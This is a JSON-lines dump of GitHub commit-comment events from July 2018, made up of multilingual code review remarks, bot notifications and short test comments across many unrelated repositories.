{"id":"7927402392","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29617800,"position":null,"line":null,"path":null,"commit_id":"11aaba3a2858c26464ac8cc03689d778cf6b5785","created_at":"2018-07-06T07:53:43Z","updated_at":"2018-07-06T07:53:43Z","author_association":"COLLABORATOR","body":"Puzzle `1083-da87ec45` discovered in   [`pom.xml`](  https://github.com/zerocracy/farm/blob/master/pom.xml)   and submitted as #1351. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-06T07:53:43Z"}
{"id":"7927407936","type":"CommitCommentEvent","actor":{"login":"aellis77"},"repo":{"name":"LambdaSchool/Precourse"},"payload":{"comment":{"id":29617807,"position":null,"line":null,"path":null,"commit_id":"902cbf46eda9b7354ba661dbd741188268932769","created_at":"2018-07-06T07:54:57Z","updated_at":"2018-07-06T07:54:57Z","author_association":"NONE","body":"Ugh. I lost wonderful writing prompts to the beginning of a web site. Now that my muse has left me, I don't remember what I wrote."}},"created_at":"2018-07-06T07:54:57Z"}
{"id":"7927409415","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"clickstorm/cs_seo"},"payload":{"comment":{"id":29617815,"position":null,"line":null,"path":null,"commit_id":"51b76d699409fc277b96a4b614c0c1b5762a12b8","created_at":"2018-07-06T07:55:19Z","updated_at":"2018-07-06T07:55:19Z","author_association":"NONE","body":"- NamelessCoder\\GizzleGitPlugins\\GizzlePlugins\\ClonePlugin:000000000c5482890000000041851013:\n  - 0: Executing Git clone command: /usr/bin/git clone --depth 1 --single-branch --branch '3.0.0' 'https://github.com/clickstorm/cs_seo.git' /tmp/51b76d699409fc277b96a4b614c0c1b5762a12b8/cs_seo\n  - NamelessCoder\\TYPO3RepositoryGizzle\\GizzlePlugins\\ExtensionRepositoryReleasePlugin:000000000c5482970000000041851013:\n    - resultCode: 10504\n    - resultMessages:\n      - 0: Please note that it might take a while (up to an hour) until your extension and the documentation appear on TYPO3.org.\n      - version: 3.0.0"}},"created_at":"2018-07-06T07:55:19Z"}
{"id":"7927409664","type":"CommitCommentEvent","actor":{"login":"MetalKnight"},"repo":{"name":"nsnam/ns-3-dev-git"},"payload":{"comment":{"id":29617817,"position":null,"line":null,"path":null,"commit_id":"7eba2f54621a406d28ee0fa7ce88d6d78e5e52bd","created_at":"2018-07-06T07:55:23Z","updated_at":"2018-07-06T07:55:23Z","author_association":"CONTRIBUTOR","body":"@tomhenderson it seems we have an issue with WOSS UAN patch integration.\r\nthis method is required for WOSS.\r\nbut the .cpp method of uan-prop-modem.cpp has never been merged probably"}},"created_at":"2018-07-06T07:55:23Z"}
{"id":"7927409983","type":"CommitCommentEvent","actor":{"login":"nlct"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29617820,"position":null,"line":null,"path":null,"commit_id":"6a7fb3f7bdc68b41126d3fd4431b743e24fe71cf","created_at":"2018-07-06T07:55:27Z","updated_at":"2018-07-06T07:55:27Z","author_association":"COLLABORATOR","body":"Okay. Will do."}},"created_at":"2018-07-06T07:55:27Z"}
{"id":"7927411245","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"Ad1n/Black_Jack"},"payload":{"comment":{"id":29617827,"position":111,"line":109,"path":"game.rb","commit_id":"7fc15298c5fae67edb398a7e9a5647a00f1f27fe","created_at":"2018-07-06T07:55:46Z","updated_at":"2018-07-06T07:55:46Z","author_association":"NONE","body":"Логика и интерфейс игры перемешаны, нужно интерфейс вынести в отдельный класс"}},"created_at":"2018-07-06T07:55:46Z"}
{"id":"7927416751","type":"CommitCommentEvent","actor":{"login":"sQu4rks"},"repo":{"name":"sQu4rks/crowsfoot"},"payload":{"comment":{"id":29617836,"position":5,"line":35,"path":"templates/base.html","commit_id":"1ce22f803c4a2d7601de2a10dc061ab1ce86663b","created_at":"2018-07-06T07:57:08Z","updated_at":"2018-07-06T07:57:08Z","author_association":"OWNER","body":"It was not intended indeed. I'll patch that away later in the day. Thanks for the heads-up\r\n"}},"created_at":"2018-07-06T07:57:08Z"}
{"id":"7927428461","type":"CommitCommentEvent","actor":{"login":"wanghaha666"},"repo":{"name":"wanghaha666/work"},"payload":{"comment":{"id":29617859,"position":null,"line":null,"path":null,"commit_id":"f18af7794fea334c9f31d9f41668f6a629316e97","created_at":"2018-07-06T07:59:45Z","updated_at":"2018-07-06T07:59:45Z","author_association":"OWNER","body":"wanghh"}},"created_at":"2018-07-06T07:59:45Z"}
{"id":"7927437094","type":"CommitCommentEvent","actor":{"login":"mstrullu"},"repo":{"name":"hortonworks/ansible-hortonworks"},"payload":{"comment":{"id":29617886,"position":null,"line":null,"path":null,"commit_id":"4d417373d5fbb1d9c9a1414316603fd57ffa6140","created_at":"2018-07-06T08:01:43Z","updated_at":"2018-07-06T08:01:43Z","author_association":"NONE","body":"Hello,\r\nI have got the same error. I will open a new issue.\r\n"}},"created_at":"2018-07-06T08:01:43Z"}
{"id":"7927438380","type":"CommitCommentEvent","actor":{"login":"hgouraud"},"repo":{"name":"geneweb/geneweb"},"payload":{"comment":{"id":29617889,"position":null,"line":null,"path":null,"commit_id":"f733c7f9ae13d8c7ceee7863ae3a36148ba603a7","created_at":"2018-07-06T08:02:01Z","updated_at":"2018-07-06T08:02:01Z","author_association":"CONTRIBUTOR","body":"L'opérateur c'est \"in\" ou \"is_substr\". Il reste un \"in\" dans le code?? (lignes 231/232)"}},"created_at":"2018-07-06T08:02:01Z"}
{"id":"7927439541","type":"CommitCommentEvent","actor":{"login":"vidya-cdtje"},"repo":{"name":"vidya-cdtje/dteja_friendlyAppBackendProject"},"payload":{"comment":{"id":29617891,"position":null,"line":null,"path":null,"commit_id":"11bd27ed1d5e694319efa497e72a726166d4c373","created_at":"2018-07-06T08:02:17Z","updated_at":"2018-07-06T08:02:17Z","author_association":"OWNER","body":"updated backend"}},"created_at":"2018-07-06T08:02:17Z"}
{"id":"7927440319","type":"CommitCommentEvent","actor":{"login":"prathamchande"},"repo":{"name":"prathamchande/gitdemo"},"payload":{"comment":{"id":29617892,"position":null,"line":null,"path":null,"commit_id":"11073fc59fb04953d4f14ebf451b19176fd81ad6","created_at":"2018-07-06T08:02:29Z","updated_at":"2018-07-06T08:02:29Z","author_association":"OWNER","body":"dvd"}},"created_at":"2018-07-06T08:02:29Z"}
{"id":"7927443075","type":"CommitCommentEvent","actor":{"login":"CizChenzhoU"},"repo":{"name":"ThomasHuai/puzzle"},"payload":{"comment":{"id":29617902,"position":null,"line":null,"path":null,"commit_id":"1d6cc4653ffbe6ec057ddef72b1582cc6cb4236d","created_at":"2018-07-06T08:03:09Z","updated_at":"2018-07-06T08:03:09Z","author_association":"NONE","body":"谢谢你，最开始编译的时候就报错，然后就在find_closiest加上Global。后续没管了\r\n\r\n您刚改的还是会报错。\r\n\r\n我把find_closiest方法中\r\nif n_diff < FAR   and cur_color[3] <= REPATE:\r\n更改为\r\nif n_diff < 10000 and cur_color[3] <= REPATE:\r\n\r\n正常了，至少运行是成功的，效果我再调试。\r\n\r\n再次感谢"}},"created_at":"2018-07-06T08:03:09Z"}
{"id":"7927444298","type":"CommitCommentEvent","actor":{"login":"surgerer"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29617903,"position":10,"line":10,"path":"Dodo.RestaurantBoard.Tests/TestDebugger.cs","commit_id":"2b8402313fe324ea0d53b3ed9511ae310e5cc4d2","created_at":"2018-07-06T08:03:25Z","updated_at":"2018-07-06T08:03:25Z","author_association":"NONE","body":"А писать комментарии - это забавно!)"}},"created_at":"2018-07-06T08:03:25Z"}
{"id":"7927465230","type":"CommitCommentEvent","actor":{"login":"luoshengye"},"repo":{"name":"bj-tydic/vds"},"payload":{"comment":{"id":29617928,"position":22,"line":21,"path":"docs/README.md","commit_id":"e67aae5d1aa0481b791434fb560b405da4bf861b","created_at":"2018-07-06T08:08:20Z","updated_at":"2018-07-06T08:08:20Z","author_association":"CONTRIBUTOR","body":"[]11"}},"created_at":"2018-07-06T08:08:20Z"}
{"id":"7927470804","type":"CommitCommentEvent","actor":{"login":"ghostemperor"},"repo":{"name":"DuGuQiuBai/Java"},"payload":{"comment":{"id":29617938,"position":null,"line":null,"path":null,"commit_id":"8e778f38dbe34a5113cbaf8bb2d7c37bebeb0a67","created_at":"2018-07-06T08:09:42Z","updated_at":"2018-07-06T08:09:42Z","author_association":"NONE","body":"useful"}},"created_at":"2018-07-06T08:09:42Z"}
{"id":"7927473928","type":"CommitCommentEvent","actor":{"login":"lkreimann"},"repo":{"name":"plentymarkets/plugin-ceres"},"payload":{"comment":{"id":29617951,"position":null,"line":null,"path":null,"commit_id":"ecefde1ac361d018b4d886d558b8b51729e3acc1","created_at":"2018-07-06T08:10:24Z","updated_at":"2018-07-06T08:10:24Z","author_association":"NONE","body":"Glaube die Änderungen wurden nicht richtig gemerged. Siehe: https://github.com/plentymarkets/plugin-ceres/commit/4b582efd69a126cafa099a2d68b986d857934936#diff-b71a6feed738cf93712cc1a55102b6d6 \r\nHabe mich da auch schon gemeldet, aber vielleicht werde ich hier ja erhört :D"}},"created_at":"2018-07-06T08:10:24Z"}
{"id":"7927477161","type":"CommitCommentEvent","actor":{"login":"capricorn2001"},"repo":{"name":"vantu5z/RHVoice-dictionary"},"payload":{"comment":{"id":29617956,"position":null,"line":null,"path":null,"commit_id":"4a122434a72e07047abf9dbb1a12f027b475e570","created_at":"2018-07-06T08:11:09Z","updated_at":"2018-07-06T08:11:09Z","author_association":"COLLABORATOR","body":"Не перестарался я с комментариями?"}},"created_at":"2018-07-06T08:11:09Z"}
{"id":"7927478242","type":"CommitCommentEvent","actor":{"login":"bencefr"},"repo":{"name":"NordicSemiconductor/pc-ble-driver-js"},"payload":{"comment":{"id":29617957,"position":null,"line":null,"path":null,"commit_id":"34b4ddf7ba962e69a0c8f9f780b7d285248d6df8","created_at":"2018-07-06T08:11:25Z","updated_at":"2018-07-06T08:11:25Z","author_association":"CONTRIBUTOR","body":"This looks awesome!"}},"created_at":"2018-07-06T08:11:25Z"}
{"id":"7927479550","type":"CommitCommentEvent","actor":{"login":"endiliey"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29617961,"position":null,"line":null,"path":null,"commit_id":"936725c94d156a832cadd971bd64497e20e16b80","created_at":"2018-07-06T08:11:43Z","updated_at":"2018-07-06T08:11:43Z","author_association":"COLLABORATOR","body":"Was going to comment on 1.3.2 PR 😂 "}},"created_at":"2018-07-06T08:11:43Z"}
{"id":"7927480047","type":"CommitCommentEvent","actor":{"login":"mps4dev"},"repo":{"name":"Nebres/Kodilla-Course"},"payload":{"comment":{"id":29617964,"position":24,"line":15,"path":"kodilla-exception/src/main/java/com/kodilla/exception/test/FlightRunner.java","commit_id":"66edda35311bfaf023342422532b5e223d0d52ab","created_at":"2018-07-06T08:11:50Z","updated_at":"2018-07-06T08:11:50Z","author_association":"COLLABORATOR","body":"Nie potrzebnie umieszczasz blok try w bloku gry. Wystarczy jeden poziom "}},"created_at":"2018-07-06T08:11:50Z"}
{"id":"7927484652","type":"CommitCommentEvent","actor":{"login":"yangshun"},"repo":{"name":"facebook/Docusaurus"},"payload":{"comment":{"id":29617970,"position":null,"line":null,"path":null,"commit_id":"936725c94d156a832cadd971bd64497e20e16b80","created_at":"2018-07-06T08:12:52Z","updated_at":"2018-07-06T08:12:52Z","author_association":"MEMBER","body":"Ugh I always seem to forget something."}},"created_at":"2018-07-06T08:12:52Z"}
{"id":"7927500323","type":"CommitCommentEvent","actor":{"login":"AlessandroMiola"},"repo":{"name":"AlessandroMiola/BitcoinBlockchainTechnology"},"payload":{"comment":{"id":29618000,"position":null,"line":null,"path":null,"commit_id":"5d745d4c09906d79da27a626d6a88ecfaa850e2e","created_at":"2018-07-06T08:16:19Z","updated_at":"2018-07-06T08:16:19Z","author_association":"OWNER","body":"Module for encoding of just a coordinate (instead of the whole point) needed within elliptic curve modules? (I'm referring to line 22 in coercehashtopoint). Could it make sense?\r\nProbably not... In this case, just leave line 22 as it is."}},"created_at":"2018-07-06T08:16:19Z"}
{"id":"7927508113","type":"CommitCommentEvent","actor":{"login":"croqaz"},"repo":{"name":"hfrappier/cmd"},"payload":{"comment":{"id":29618009,"position":null,"line":null,"path":null,"commit_id":"0d6d1f1cbaf890a543d9dbce0cf9647be9fefbb0","created_at":"2018-07-06T08:18:04Z","updated_at":"2018-07-06T08:18:04Z","author_association":"NONE","body":"I love this and I would like to see it merged ! 😿 "}},"created_at":"2018-07-06T08:18:04Z"}
{"id":"7927510420","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29618015,"position":null,"line":null,"path":null,"commit_id":"750f0d7f612078ecfdb2aea2c123e98ee421785e","created_at":"2018-07-06T08:18:34Z","updated_at":"2018-07-06T08:18:34Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://752b6568.ngrok.io/ui#review:id=374)"}},"created_at":"2018-07-06T08:18:34Z"}
{"id":"7927511614","type":"CommitCommentEvent","actor":{"login":"rogerhub"},"repo":{"name":"atom/github"},"payload":{"comment":{"id":29618020,"position":8,"line":200,"path":"lib/views/push-pull-view.js","commit_id":"9c279aebfbb7d492593226d732b17dc0dba73346","created_at":"2018-07-06T08:18:51Z","updated_at":"2018-07-06T08:18:51Z","author_association":"NONE","body":"If `tileState` is undefined, then this raises an exception. The old code handled this gracefully (because of the `tileState &&` on line 204)."}},"created_at":"2018-07-06T08:18:51Z"}
{"id":"7927515351","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618025,"position":10,"line":10,"path":"server/controllers/storeList.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:19:42Z","updated_at":"2018-07-06T08:19:42Z","author_association":"NONE","body":"Quelle est la différence entre l'approche `catch/log/exit` versus laisser l'exception se produire ?"}},"created_at":"2018-07-06T08:19:42Z"}
{"id":"7927515569","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29618026,"position":null,"line":null,"path":null,"commit_id":"a3e382e42cb3d60714595a34d9e432d2eeb65476","created_at":"2018-07-06T08:19:45Z","updated_at":"2018-07-06T08:19:45Z","author_association":"COLLABORATOR","body":"Puzzle `908-27b4bc69` disappeared from [`src/main/java/com/zerocracy/pmo/Resumes.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/Resumes.java), that's why I closed #1146. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-06T08:19:45Z"}
{"id":"7927516652","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29618030,"position":null,"line":null,"path":null,"commit_id":"a3e382e42cb3d60714595a34d9e432d2eeb65476","created_at":"2018-07-06T08:19:59Z","updated_at":"2018-07-06T08:19:59Z","author_association":"COLLABORATOR","body":"Puzzle `1146-0cb0fd88` discovered in   [`src/main/groovy/com/zerocracy/stk/pmo/resumes/assign_examiner.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pmo/resumes/assign_examiner.groovy)   and submitted as #1352. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-06T08:19:59Z"}
{"id":"7927517783","type":"CommitCommentEvent","actor":{"login":"sugandhakhera"},"repo":{"name":"sundarsv/upgrad_course5_ass1gnment"},"payload":{"comment":{"id":29618032,"position":null,"line":null,"path":null,"commit_id":"f45f17d1fe6fda41a9c59c46268e3f25dc64610a","created_at":"2018-07-06T08:20:14Z","updated_at":"2018-07-06T08:20:14Z","author_association":"COLLABORATOR","body":"Please uncomment test cases and resolve all compile time errors"}},"created_at":"2018-07-06T08:20:14Z"}
{"id":"7927517886","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29618033,"position":null,"line":null,"path":null,"commit_id":"a3e382e42cb3d60714595a34d9e432d2eeb65476","created_at":"2018-07-06T08:20:15Z","updated_at":"2018-07-06T08:20:15Z","author_association":"COLLABORATOR","body":"Puzzle `1146-1c2b1c20` discovered in   [`src/main/groovy/com/zerocracy/stk/pmo/resumes/assign_examiner.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pmo/resumes/assign_examiner.groovy)   and submitted as #1353. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-06T08:20:15Z"}
{"id":"7927523199","type":"CommitCommentEvent","actor":{"login":"benbest011"},"repo":{"name":"benbest011/python"},"payload":{"comment":{"id":29618042,"position":null,"line":null,"path":null,"commit_id":"04a99780d233c53a586cbc21e11311cb714adc71","created_at":"2018-07-06T08:21:22Z","updated_at":"2018-07-06T08:21:22Z","author_association":"OWNER","body":"just a  test 2018-07-06 16:21"}},"created_at":"2018-07-06T08:21:22Z"}
{"id":"7927536031","type":"CommitCommentEvent","actor":{"login":"jarvist"},"repo":{"name":"jarvist/TheDancer.jl"},"payload":{"comment":{"id":29618067,"position":null,"line":null,"path":null,"commit_id":"854fd8720b3c5a4dc8e6744a8a2239f3d4230595","created_at":"2018-07-06T08:24:08Z","updated_at":"2018-07-06T08:24:08Z","author_association":"OWNER","body":"That `221` magic number should probably become a `const` variable!\r\nAnd now `9*r^7` ?!"}},"created_at":"2018-07-06T08:24:08Z"}
{"id":"7927559745","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618119,"position":7,"line":7,"path":"server/import/store.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:29:16Z","updated_at":"2018-07-06T08:29:16Z","author_association":"NONE","body":"Bonne approche !\r\n\r\nAlternative, trouver via une inspection des requêtes du sites web :\r\n```bash\r\ncurl 'http://www.micromania.fr/shops/index/getStoreLocator/' \\\r\n  --data 'mainShopInput=paris&eSportFilter=0&zingFilter=0&nbResultPerPage=20'\r\n```\r\n\r\nPuis jouer avec le paramètres `nbResultPerPage`"}},"created_at":"2018-07-06T08:29:16Z"}
{"id":"7927562618","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618123,"position":71,"line":71,"path":"server/import/store.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:29:54Z","updated_at":"2018-07-06T08:29:54Z","author_association":"NONE","body":"Comment pourrait-on optimiser le temps d'exécution de ces requêtes ?"}},"created_at":"2018-07-06T08:29:54Z"}
{"id":"7927562964","type":"CommitCommentEvent","actor":{"login":"sebastianst"},"repo":{"name":"sebastianst/ABY"},"payload":{"comment":{"id":29618126,"position":21,"line":2878,"path":"src/abycore/circuit/booleancircuits.cpp","commit_id":"74846509e672e47dc481b5ded9e8c3f2deb82367","created_at":"2018-07-06T08:29:59Z","updated_at":"2018-07-06T08:29:59Z","author_association":"OWNER","body":"c9dd9b14c40604a52de8f424776e6a2f1a5a7a38"}},"created_at":"2018-07-06T08:29:59Z"}
{"id":"7927565221","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29618128,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-06T08:30:27Z","updated_at":"2018-07-06T08:30:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-06T08:30:27Z"}
{"id":"7927568731","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618134,"position":10,"line":10,"path":"client/src/uis/StoreListItem/index.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:31:12Z","updated_at":"2018-07-06T08:31:12Z","author_association":"NONE","body":"Bien vu, le `PureComponent` permet de se prémunir de re-render *tous les markers* à chaque sélection d'un seul marqueur ! 👏 "}},"created_at":"2018-07-06T08:31:12Z"}
{"id":"7927569106","type":"CommitCommentEvent","actor":{"login":"tobyjamez"},"repo":{"name":"bombrun/GaiaLab"},"payload":{"comment":{"id":29618135,"position":null,"line":null,"path":null,"commit_id":"66760dba58d59ab310b7a16d9af5183cf2524089","created_at":"2018-07-06T08:31:17Z","updated_at":"2018-07-06T08:31:17Z","author_association":"COLLABORATOR","body":"Not a significant change but useful for comparing original data with reduced-noise data produced with hits.noiseremoval."}},"created_at":"2018-07-06T08:31:17Z"}
{"id":"7927570784","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618145,"position":10,"line":10,"path":"client/src/uis/Marker/index.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:31:39Z","updated_at":"2018-07-06T08:31:39Z","author_association":"NONE","body":"Bien vu, le `PureComponent` permet de se prémunir de re-render *tous les markers* à chaque sélection d'un seul marqueur ! 👏 "}},"created_at":"2018-07-06T08:31:39Z"}
{"id":"7927571014","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/xraylib-feedstock"},"payload":{"comment":{"id":29618147,"position":null,"line":null,"path":null,"commit_id":"e35cc4851adebbaff0ce564e01a46b8a52f7cd5c","created_at":"2018-07-06T08:31:42Z","updated_at":"2018-07-06T08:31:42Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @cj-wright were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-06T08:31:42Z"}
{"id":"7927571419","type":"CommitCommentEvent","actor":{"login":"TjWallas"},"repo":{"name":"TjWallas/sandnet-migration-strategies"},"payload":{"comment":{"id":29618149,"position":4,"line":91,"path":"startvagrant.sh","commit_id":"dfab2396157f12523674b07d28e5bfa2ca5bd4b8","created_at":"2018-07-06T08:31:48Z","updated_at":"2018-07-06T08:31:48Z","author_association":"OWNER","body":"@JeannineBorn This does not make sense to me. Extnet in our testbed is \"The Internet\". Prodnet need not have SSH access to some machine on the Internet :). Can we do something about this?"}},"created_at":"2018-07-06T08:31:48Z"}
{"id":"7927573886","type":"CommitCommentEvent","actor":{"login":"Naoki-Hiraoka"},"repo":{"name":"jsk-ros-pkg/jsk_roseus"},"payload":{"comment":{"id":29618156,"position":null,"line":null,"path":null,"commit_id":"f40f3a74d11c9c31872c4c98ccc084e05a628dec","created_at":"2018-07-06T08:32:21Z","updated_at":"2018-07-06T08:32:21Z","author_association":"NONE","body":"```\r\n7.E4-irteusgl$ send (make-cube 1 1 1) :body-type                                \r\n(:cube 1.0 1.0 1.0)                                                             \r\n8.E4-irteusgl$ send (make-cylinder 1 1) :body-type                              \r\n(:cylinder 1.0 1.0 12)                                                          \r\n9.E4-irteusgl$ send (make-sphere 1) :body-type                                  \r\n(:gdome #<body #X67bbdf0 (:icosahedron 1) 0.0 0.0 0.0 / 0.0 0.0 0.0>)  \r\n```\r\nとなっているため、\r\nこれによって、cylinderの場合はうまくいく。cube,sphereはうまくいかない。"}},"created_at":"2018-07-06T08:32:21Z"}
{"id":"7927576086","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618161,"position":10,"line":10,"path":"client/src/uis/Button/index.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:32:50Z","updated_at":"2018-07-06T08:32:50Z","author_association":"NONE","body":"On préfère avec des noms de classe cohérent avec le nom du fichier 😉 "}},"created_at":"2018-07-06T08:32:50Z"}
{"id":"7927577782","type":"CommitCommentEvent","actor":{"login":"livemusicbangla"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":29618165,"position":4,"line":482,"path":"style.css","commit_id":"9ce6e4187d3b5b8655a2134aed62193e129a8f19","created_at":"2018-07-06T08:33:13Z","updated_at":"2018-07-06T08:33:13Z","author_association":"NONE","body":"Open"}},"created_at":"2018-07-06T08:33:13Z"}
{"id":"7927581095","type":"CommitCommentEvent","actor":{"login":"globaltoken"},"repo":{"name":"globaltoken/node-open-mining-portal"},"payload":{"comment":{"id":29618170,"position":null,"line":null,"path":null,"commit_id":"8a62f6a75b838ea16fcf7d9f7ffda0b14b4576b2","created_at":"2018-07-06T08:33:55Z","updated_at":"2018-07-06T08:33:55Z","author_association":"OWNER","body":"@857487 Hello,\r\n\r\nThis repo is still in development.\r\nEquihash will not work here, I disabled it, because it is difficult.\r\nEquihash uses bigger block headers.\r\n\r\nBLAKE2B is difficult. We will integrate it for GlobalToken Blake2B.\r\nIf you mean SIA, you should change some stratum stuff.\r\n\r\nSIA has a different stratum protocol.\r\n\r\nRegars."}},"created_at":"2018-07-06T08:33:55Z"}
{"id":"7927581337","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618171,"position":21,"line":21,"path":"client/src/reducers/stores.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:33:59Z","updated_at":"2018-07-06T08:33:59Z","author_association":"NONE","body":"Est-ce qu'on est sûr de vouloir `initialState` ici ?"}},"created_at":"2018-07-06T08:33:59Z"}
{"id":"7927583685","type":"CommitCommentEvent","actor":{"login":"ruthmaclean"},"repo":{"name":"pivotal-cf/docs-on-demand-service-broker"},"payload":{"comment":{"id":29618175,"position":null,"line":null,"path":null,"commit_id":"8a66181b22af3c3b148b91989b0cbd540dd5472d","created_at":"2018-07-06T08:34:29Z","updated_at":"2018-07-06T08:34:29Z","author_association":"COLLABORATOR","body":"approved "}},"created_at":"2018-07-06T08:34:29Z"}
{"id":"7927584144","type":"CommitCommentEvent","actor":{"login":"NamelessCoder"},"repo":{"name":"mhirdes/go_maps_ext"},"payload":{"comment":{"id":29618176,"position":null,"line":null,"path":null,"commit_id":"37399c9da17374504e78cfc35132c2ae5c127600","created_at":"2018-07-06T08:34:36Z","updated_at":"2018-07-06T08:34:36Z","author_association":"NONE","body":"- NamelessCoder\\GizzleGitPlugins\\GizzlePlugins\\ClonePlugin:000000007927d4d300000000731ef3a5:\n  - 0: Executing Git clone command: /usr/bin/git clone --depth 1 --single-branch --branch '2.5.0' 'https://github.com/mhirdes/go_maps_ext.git' /tmp/37399c9da17374504e78cfc35132c2ae5c127600/go_maps_ext\n  - NamelessCoder\\TYPO3RepositoryGizzle\\GizzlePlugins\\ExtensionRepositoryReleasePlugin:000000007927d4cd00000000731ef3a5:\n    - resultCode: 10504\n    - resultMessages:\n      - 0: Please note that it might take a while (up to an hour) until your extension and the documentation appear on TYPO3.org.\n      - version: 2.5.0"}},"created_at":"2018-07-06T08:34:36Z"}
{"id":"7927585585","type":"CommitCommentEvent","actor":{"login":"ruthmaclean"},"repo":{"name":"pivotal-cf/docs-on-demand-service-broker"},"payload":{"comment":{"id":29618179,"position":null,"line":null,"path":null,"commit_id":"8a66181b22af3c3b148b91989b0cbd540dd5472d","created_at":"2018-07-06T08:34:56Z","updated_at":"2018-07-06T08:34:56Z","author_association":"COLLABORATOR","body":"please merge to master only @pivotal-cf/docs "}},"created_at":"2018-07-06T08:34:56Z"}
{"id":"7927586442","type":"CommitCommentEvent","actor":{"login":"btoueg"},"repo":{"name":"Exayy/testing"},"payload":{"comment":{"id":29618180,"position":12,"line":12,"path":"client/src/reducers/selectedStores.js","commit_id":"43bd252f00fd3995db24de600c60e63d65a8d625","created_at":"2018-07-06T08:35:07Z","updated_at":"2018-07-06T08:35:07Z","author_association":"NONE","body":"`state[action.payload.index] !== true ? true : false` 😱 \r\n\r\nPréférer :\r\n\r\n```javascript\r\nreturn {\r\n  ...state,\r\n  [action.payload.index] : !state[action.payload.index],\r\n}\r\n```"}},"created_at":"2018-07-06T08:35:07Z"}
{"id":"7927586657","type":"CommitCommentEvent","actor":{"login":"ydc201314"},"repo":{"name":"ydc201314/yuwan"},"payload":{"comment":{"id":29618184,"position":null,"line":null,"path":null,"commit_id":"341df3afaabd0a6446ccf6019035f51c663cb135","created_at":"2018-07-06T08:35:10Z","updated_at":"2018-07-06T08:35:10Z","author_association":"OWNER","body":"2018-06-12"}},"created_at":"2018-07-06T08:35:10Z"}
